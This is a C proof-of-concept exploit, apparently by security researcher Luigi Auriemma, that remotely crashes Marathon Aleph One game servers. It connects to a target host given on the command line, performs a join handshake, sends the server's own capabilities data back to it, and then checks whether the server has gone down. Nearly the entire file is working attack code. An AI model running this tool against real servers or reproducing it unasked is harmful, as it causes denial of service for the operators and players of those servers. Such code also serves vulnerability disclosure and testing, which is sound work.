/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER                     "0.1"
#define kMaximumMessageLength   (4 * 1024 * 1024)
#define PORT                    4226
#define kNetworkSetupProtocolID "Aleph One WonderNAT V1"



int send_alephone(int sd, int msg_type, u_char *data, int datasz);
int recv_alephone(int sd, int *msg_type, u_char *data);
int recv_mem(int sd, u_char *data, int len);
int put08(u_char *data, int num);
int get08(u_char *data, int *num);
int put16(u_char *data, int num);
int get16(u_char *data, int *num);
int put32(u_char *data, int num);
int get32(u_char *data, int *num);
int putss(u_char *data, u_char *str);
int putsc(u_char *data, u_char chr, int strlen);
#define putsx(data, src, len)   len; strncpy(data - len, src, len);
void delimit(u_char *data);
int timeout(int sock, int secs);
u_int resolv(char *host);
void std_err(void);



enum {
  kHELLO_MESSAGE = 700,
  kJOINER_INFO_MESSAGE,
  kJOIN_PLAYER_MESSAGE,
  kCAPABILITIES_MESSAGE,
  kACCEPT_JOIN_MESSAGE,
  kTOPOLOGY_MESSAGE,
  kMAP_MESSAGE,
  kPHYSICS_MESSAGE,
  kLUA_MESSAGE,
  kCHAT_MESSAGE,
  kUNKNOWN_MESSAGE_MESSAGE,
  kEND_GAME_DATA_MESSAGE,
  kCHANGE_COLORS_MESSAGE,
  kSERVER_WARNING_MESSAGE,
  kCLIENT_INFO_MESSAGE
};
static const int kGameworldVersion = 1;
static const int kStarVersion = 3;
static const int kRingVersion = 1;
static const int kLuaVersion = 1;
static const int kSpeexVersion = 1;
static const int kGatherableVersion = 1;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            msg_type;
    u_short port  = PORT;
    u_char  *data,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Marathon Aleph One <= 16 Dec 2006 remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));


    printf("- do an empty connection\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    sleep(1);
    printf("- disconnect\n");
    close(sd);


    printf("- do a normal connection\n");
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    data = malloc(kMaximumMessageLength);
    if(!data) std_err();

    len = recv_alephone(sd, &msg_type, data);
    if(len < 0) goto quit;
    printf("- type %u: %s\n", msg_type, data);


        /* prospective_joiner_info */
    p = data;
    p += put16(p, time(NULL));                          // stream_id
    p += putss(p, "a_good_nickname_of_max_32_chars");   // name (max 32 chars)
    p += putss(p, kNetworkSetupProtocolID);             // protocolID
    p += put16(p, 0);                                   // color
    p += put16(p, 0);                                   // team
    len = p - data;
    printf("- join server\n");
    send_alephone(sd, kJOINER_INFO_MESSAGE, data, len);

    len = recv_alephone(sd, &msg_type, data);
    if(len < 0) goto quit;


        /* capabilities */
    /*
    p = data;
    p += putss(p, "Gameworld");     p += put32(p, kGameworldVersion);
    p += putss(p, "Gatherable");    p += put32(p, kGatherableVersion);
    p += putss(p, "Speex");         p += put32(p, kSpeexVersion);
    p += putss(p, "Star");          p += put32(p, kStarVersion);
    len = p - data;
    */

    /* instead of creating the capabilities info we get those of the server and send them back */

    printf("- send the capabilities informations\n");
    send_alephone(sd, kCAPABILITIES_MESSAGE, data, len);

    len = recv_alephone(sd, &msg_type, data);
    if(len < 0) goto quit;


quit:
    close(sd);

    printf("- check if server is vulnerable\n");
    sleep(1);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
        printf("\nServer IS vulnerable!!!\n\n");
    } else {
        printf("\nServer doesn't seem vulnerable\n\n");
    }

    close(sd);
    return(0);
}



int send_alephone(int sd, int msg_type, u_char *data, int datasz) {
    u_char  buff[8],
            *p;

    p = buff;
    p += put16(p, 0xdead);
    p += put16(p, msg_type);
    p += put32(p, 8 + datasz);

    if(send(sd, buff, 8,      0) < 0) return(-1);
    if(send(sd, data, datasz, 0) < 0) return(-1);

    return(0);
}



int recv_alephone(int sd, int *msg_type, u_char *data) {
    int     len,
            magic,
            datasz;
    u_char  buff[8],
            *p;

    len = recv_mem(sd, buff, 8);
    if(len < 0) return(-1);

    p = buff;
    p += get16(p, &magic);
    p += get16(p, msg_type);
    p += get32(p, &datasz);

    datasz -= 8;
    if((datasz < 0) || (datasz > kMaximumMessageLength)) return(-1);

    len = recv_mem(sd, data, datasz);
    if(len < 0) return(-1);

    return(datasz);
}



int recv_mem(int sd, u_char *data, int len) {
    int     t;

    while(len) {
        t = recv(sd, data, len, 0);
        if(t <= 0) return(-1);
        data += t;
        len  -= t;
    }
    return(0);
}



int put08(u_char *data, int num) {
    data[0] = num;
    return(1);
}



int get08(u_char *data, int *num) {
    if(num) {
        *num = data[0];
    }
    return(1);
}



int put16(u_char *data, int num) {
    data[0] = num >> 8;
    data[1] = num;
    return(2);
}



int get16(u_char *data, int *num) {
    if(num) {
        *num = (data[0] << 8) | data[1];
    }
    return(2);
}



int put32(u_char *data, int num) {
    data[0] = num >> 24;
    data[1] = num >> 16;
    data[2] = num >> 8;
    data[3] = num;
    return(4);
}



int get32(u_char *data, int *num) {
    if(num) {
        *num = (data[0] << 24) | (data[1] << 16) | (data[2] << 8) | data[3];
    }
    return(4);
}



int putss(u_char *data, u_char *str) {
    u_char  *p;

    p = str;
    do {
        *data++ = *p++;
    } while(*(p - 1));

    return(p - str);
}



int putsc(u_char *data, u_char chr, int strlen) {
    u_char  *p;

    for(p = data; strlen; strlen--) {
        *p++ = chr;
    }
    *p++ = 0;

    return(p - data);
}



void delimit(u_char *data) {
    while(*data && (*data != '\n') && (*data != '\r')) data++;
    *data = 0;
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


